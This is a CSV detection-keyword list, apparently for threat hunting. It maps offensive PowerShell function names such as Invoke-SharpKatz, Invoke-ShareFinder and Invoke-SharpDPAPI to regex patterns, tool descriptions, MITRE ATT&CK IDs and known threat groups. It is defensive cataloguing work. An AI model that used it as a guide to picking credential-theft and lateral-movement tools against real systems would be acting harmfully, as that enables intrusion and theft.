"*Invoke-SessionGopher*",".{0,1000}Invoke\-SessionGopher.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - 
TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Invoke-SessionGopher*",".{0,1000}Invoke\-SessionGopher.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-SessionGopher*",".{0,1000}Invoke\-SessionGopher.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1061","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-SessionGopher*",".{0,1000}Invoke\-SessionGopher.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Invoke-SessionGopher*",".{0,1000}Invoke\-SessionGopher.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Invoke-SessionHunter*",".{0,1000}Invoke\-SessionHunter.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","1","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*Invoke-ShadowSpray*",".{0,1000}Invoke\-ShadowSpray.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*invoke-sharefinder *",".{0,1000}invoke\-sharefinder\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - 
T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*invokesharefinder*",".{0,1000}invokesharefinder.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","63","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" "*Invoke-ShareFinder*",".{0,1000}Invoke\-ShareFinder.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - 
T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","63","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" "*Invoke-ShareFinder*",".{0,1000}Invoke\-ShareFinder.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. 
As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Invoke-ShareFinder*",".{0,1000}Invoke\-ShareFinder.{0,1000}","offensive_tool_keyword","Jira-Lens","finds (non-standard) shares on hosts in the local domain","T1595 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://powersploit.readthedocs.io/en/stable/Recon/README/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Invoke-ShareFinder*",".{0,1000}Invoke\-ShareFinder.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Invoke-SharpAllowedToAct*",".{0,1000}Invoke\-SharpAllowedToAct.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-SharpBlock*",".{0,1000}Invoke\-SharpBlock.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-SharpBypassUAC*",".{0,1000}Invoke\-SharpBypassUAC.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-SharpChromium*",".{0,1000}Invoke\-SharpChromium.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" 
"*Invoke-SharpClipboard*",".{0,1000}Invoke\-SharpClipboard.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-SharpCloud*",".{0,1000}Invoke\-SharpCloud.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-SharpCloud*",".{0,1000}Invoke\-SharpCloud.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Invoke-Sharpcradle*",".{0,1000}Invoke\-Sharpcradle.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Invoke-SharpDPAPI*",".{0,1000}Invoke\-SharpDPAPI.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation 
tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-SharpDump*",".{0,1000}Invoke\-SharpDump.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-SharPersist*",".{0,1000}Invoke\-SharPersist.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-SharpGPO*",".{0,1000}Invoke\-SharpGPO.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Invoke-SharpGPOAbuse*",".{0,1000}Invoke\-SharpGPOAbuse.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-SharpGPO-RemoteAccessPolicies*",".{0,1000}Invoke\-SharpGPO\-RemoteAccessPolicies.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - 
T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-SharpHandler*",".{0,1000}Invoke\-SharpHandler.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-SharpHide*",".{0,1000}Invoke\-SharpHide.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*InvokeSharpHound*",".{0,1000}InvokeSharpHound.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","7","609","135","2024-04-30T13:43:35Z","2021-07-12T17:07:04Z" "*Invoke-Sharphound*",".{0,1000}Invoke\-Sharphound.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Invoke-Sharphound2*",".{0,1000}Invoke\-Sharphound2.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - 
TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-Sharphound3*",".{0,1000}Invoke\-Sharphound3.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-SharpHound4*",".{0,1000}Invoke\-SharpHound4.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-Sharphound4*",".{0,1000}Invoke\-Sharphound4.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Invoke-SharpImpersonation*",".{0,1000}Invoke\-SharpImpersonation.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-SharpImpersonation*",".{0,1000}Invoke\-SharpImpersonation.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - 
T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Invoke-SharpImpersonationNoSpace*",".{0,1000}Invoke\-SharpImpersonationNoSpace.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-SharpKatz*",".{0,1000}Invoke\-SharpKatz.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-SharpLdapRelayScan*",".{0,1000}Invoke\-SharpLdapRelayScan.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-SharpLdapRelayScan*",".{0,1000}Invoke\-SharpLdapRelayScan.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" 
"*Invoke-Sharplocker*",".{0,1000}Invoke\-Sharplocker.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-SharpLoginPrompt*",".{0,1000}Invoke\-SharpLoginPrompt.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-SharpMove*",".{0,1000}Invoke\-SharpMove.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-SharpPrinter*",".{0,1000}Invoke\-SharpPrinter.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-SharpPrinter*",".{0,1000}Invoke\-SharpPrinter.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation 
Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Invoke-SharpPrintNightmare*",".{0,1000}Invoke\-SharpPrintNightmare.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-SharpRDP*",".{0,1000}Invoke\-SharpRDP.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-SharpRDP*",".{0,1000}Invoke\-SharpRDP.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. 
Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*Invoke-SharpRDP.ps1*",".{0,1000}Invoke\-SharpRDP\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Invoke-SharpRDPTest*",".{0,1000}Invoke\-SharpRDPTest.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. 
Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*Invoke-SharpSCCM*",".{0,1000}Invoke\-SharpSCCM.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-SharpSCCM*",".{0,1000}Invoke\-SharpSCCM.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Invoke-SharpSecDump*",".{0,1000}Invoke\-SharpSecDump.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-Sharpshares*",".{0,1000}Invoke\-Sharpshares.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation 
